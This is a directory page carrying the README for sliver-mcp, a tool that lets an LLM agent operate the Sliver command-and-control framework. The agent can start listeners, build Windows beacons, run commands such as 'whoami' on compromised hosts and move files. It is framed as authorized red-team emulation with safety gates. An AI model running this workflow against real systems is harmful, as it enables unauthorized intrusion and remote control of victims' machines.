sliver-mcp

sliver-mcp

A Model Context Protocol server for the Sliver C2 framework that exposes operator tools like listeners, implant generation, sessions, command execution, and file operations for LLM-driven adversary emulation.

Category
Visit Server

README

███████╗██╗     ██╗██╗   ██╗███████╗██████╗      ███╗   ███╗ ██████╗██████╗
██╔════╝██║     ██║██║   ██║██╔════╝██╔══██╗     ████╗ ████║██╔════╝██╔══██╗
███████╗██║     ██║██║   ██║█████╗  ██████╔╝████╗██╔████╔██║██║     ██████╔╝
╚════██║██║     ██║╚██╗ ██╔╝██╔══╝  ██╔══██╗╚═══╝██║╚██╔╝██║██║     ██╔═══╝
███████║███████╗██║ ╚████╔╝ ███████╗██║  ██║     ██║ ╚═╝ ██║╚██████╗██║
╚══════╝╚══════╝╚═╝  ╚═══╝  ╚══════╝╚═╝  ╚═╝     ╚═╝     ╚═╝ ╚═════╝╚═╝
   drive the Sliver C2 operator surface from an AI agent

python mcp c2 tests license

A Model Context Protocol server for the Sliver C2 framework. It exposes the Sliver operator surface — listeners, implant/beacon generation, sessions and beacons, command execution, file operations, and a structured handoff — as mcp__sliver__* tools an LLM agent can drive.

It is the C2 layer of the AI-offsec stack, built to slot in alongside the p0rtix (recon) and Metasploit (exploitation) MCP servers and orchestrated by the dagar-red skill system. It mirrors their conventions: Python + FastMCP, async tools, structured-dict returns, and a noise / arm_dangerous safety gate.

⚠️ Authorized use only. This drives a live C2 framework. Use it only against infrastructure you own or are explicitly authorized to test — owned labs, CTFs, and contracted engagements. It is built for adversary emulation: standing up realistic C2 so defenders can test and improve detection and response. The noise tiers and the arm_dangerous gate exist to keep operation deliberate and in scope.

⚡ Quick start

# install
git clone git@github.com:v0idravl/sliver-mcp.git && cd sliver-mcp
python3 -m venv venv && ./venv/bin/pip install -e .

# register with Claude Code (see below), then in-agent:
connect()                         # attach to your team server
set_noise("yellow")               # allow actions that touch a host
start_https_listener(port=443)
generate_beacon(c2_host="<redirector>", os="windows")
# … deliver the beacon, then …
poll_events(); list_sessions(); execute_command(id, "whoami")

Requires Python ≥ 3.11 and a reachable Sliver team server with an operator config (.cfg). See docs/live-test.md for standing up a local server and generating one.

🧠 How it relates to Sliver's built-in MCP

Sliver ships an experimental built-in MCP, but it is filesystem-only (≈11 tools: fs_ls, fs_cat, fs_rm, …). sliver-mcp is a superset focused on the full operator workflow — listeners, payload generation, sessions/beacons, execution, and cross-tool handoff — so an agent can run an engagement end to end.

🔌 Register with Claude Code

Add to ~/.claude.json (or via claude mcp add). Point SLIVER_CONFIG at your operator config:

"sliver": {
  "type": "stdio",
  "command": "/home/youruser/projects/sliver-mcp/venv/bin/sliver-mcp",
  "args": [],
  "env": { "SLIVER_CONFIG": "/home/youruser/.sliver-client/configs/operator.cfg" }
}

The server starts whether or not the team server is up — call connect() first; tools that need a live client return a structured "not connected" error until it succeeds.

🧰 Tool surface (mcp__sliver__*)

Category Tools What they do
Connection / state connect, status, get_version, poll_events, disconnect attach to the team server, check health, drain the async event queue (new callbacks, task results)
Listeners start_https_listener, start_http_listener, start_mtls_listener, start_dns_listener, start_wg_listener, list_jobs, kill_job stand up / tear down C2 listeners across protocols
Implant generation generate_implant, generate_beacon, list_implant_builds, list_implant_profiles, regenerate_implant build session implants and async beacons; reuse profiles and prior builds
Sessions / beacons list_sessions, list_beacons, session_info, beacon_info, kill_session, kill_beacon enumerate and inspect callbacks; retire them
Execution execute, execute_command run a binary / run a shell command on a session or beacon
File operations ls, pwd, cd, mkdir, download, upload, rm navigate and move files on the target
Pivots list_pivots enumerate pivot listeners on a session
Handoff export_handoff, ingest_handoff exchange C2 state with the rest of the stack
Safety set_noise, arm_dangerous raise the noise ceiling / unlock destructive actions

🚦 Safety / noise model

Every tool carries a noise tier. A call above the current ceiling is refused with a structured reason — never silently downgraded.

Tier Meaning Examples
passive read-only state status, list_sessions, export_handoff
green build / stand up our own infra listeners, generate_*, ls, download
yellow actions that touch the target execute, upload, kill_session
red destructive rm (also requires arm_dangerous())

The default ceiling is green: call set_noise("yellow") before running commands on a host (the sliver-ops loop does this explicitly), and arm_dangerous() to unlock rm.

🔁 Typical loop

connect()
set_noise("yellow")
start_https_listener(port=443, domain="<redirector>")
generate_beacon(c2_host="<redirector>", os="windows", interval=60, jitter=30)
# … deliver the beacon (payload-delivery / loader-injection-tradecraft) …
poll_events()            # watch for the callback
list_sessions()
execute_command(target_id, "whoami")
export_handoff()         # feed C2 state back to internal-dispatch

Beacons vs sessions

execute and the file tools accept either a session id (interactive, low latency) or a beacon id (asynchronous — the result returns after the next check-in, every interval ± jitter seconds). Use poll_events() to watch for new callbacks and task completion.

⚠️ Known limitations (v1)

These reflect the current sliver-py surface, not the design:

  • No client-side SOCKS / port-forward tunnels. sliver-py does not implement the tunnel streaming, so only list_pivots is exposed. Use the Sliver console for socks/portfwd.
  • No interactive PTY shell. A streaming PTY can't be a single request/response tool; execute_command covers command execution.
  • No cp / chmod / chown and no loot/creds store — not in sliver-py's base command set. Planned once upstream exposes them.

🩹 Troubleshooting

Symptom Fix
Every tool returns "not connected" Call connect() first. The server starts without the team server; tools needing a live client wait for a successful connect.
connect() fails Check SLIVER_CONFIG points at a valid operator .cfg, and that the team server is reachable (host/port in the config). See docs/live-test.md.
A call is "refused: above noise ceiling" Raise it deliberately: set_noise("yellow") for target-touching actions, arm_dangerous() for rm.
No callback after delivery poll_events() drains the async queue; beacons only report on the next interval ± jitter check-in.
Need SOCKS / portfwd Not exposed (see limitations) — use the Sliver console for now.

🧪 Tests

./venv/bin/pip install -e '.[dev]'
./venv/bin/pytest          # 64 tests, no live server required

The suite mocks sliver-py, so it is green on a clean machine. For a live end-to-end smoke test, see docs/live-test.md.

License

MIT. See LICENSE.

Recommended Servers

playwright-mcp

playwright-mcp

A Model Context Protocol server that enables LLMs to interact with web pages through structured accessibility snapshots without requiring vision models or screenshots.

Official
Featured
TypeScript
Magic Component Platform (MCP)

Magic Component Platform (MCP)

An AI-powered tool that generates modern UI components from natural language descriptions, integrating with popular IDEs to streamline UI development workflow.

Official
Featured
Local
TypeScript
Audiense Insights MCP Server

Audiense Insights MCP Server

Enables interaction with Audiense Insights accounts via the Model Context Protocol, facilitating the extraction and analysis of marketing insights and audience data including demographics, behavior, and influencer engagement.

Official
Featured
Local
TypeScript
VeyraX MCP

VeyraX MCP

Single MCP tool to connect all your favorite tools: Gmail, Calendar and 40 more.

Official
Featured
Local
graphlit-mcp-server

graphlit-mcp-server

The Model Context Protocol (MCP) Server enables integration between MCP clients and the Graphlit service. Ingest anything from Slack to Gmail to podcast feeds, in addition to web crawling, into a Graphlit project - and then retrieve relevant contents from the MCP client.

Official
Featured
TypeScript
Kagi MCP Server

Kagi MCP Server

An MCP server that integrates Kagi search capabilities with Claude AI, enabling Claude to perform real-time web searches when answering questions that require up-to-date information.

Official
Featured
Python
E2B

E2B

Using MCP to run code via e2b.

Official
Featured
Neon Database

Neon Database

MCP server for interacting with Neon Management API and databases

Official
Featured
Exa Search

Exa Search

A Model Context Protocol (MCP) server lets AI assistants like Claude use the Exa AI Search API for web searches. This setup allows AI models to get real-time web information in a safe and controlled way.

Official
Featured
Qdrant Server

Qdrant Server

This repository is an example of how to create a MCP server for Qdrant, a vector search engine.

Official
Featured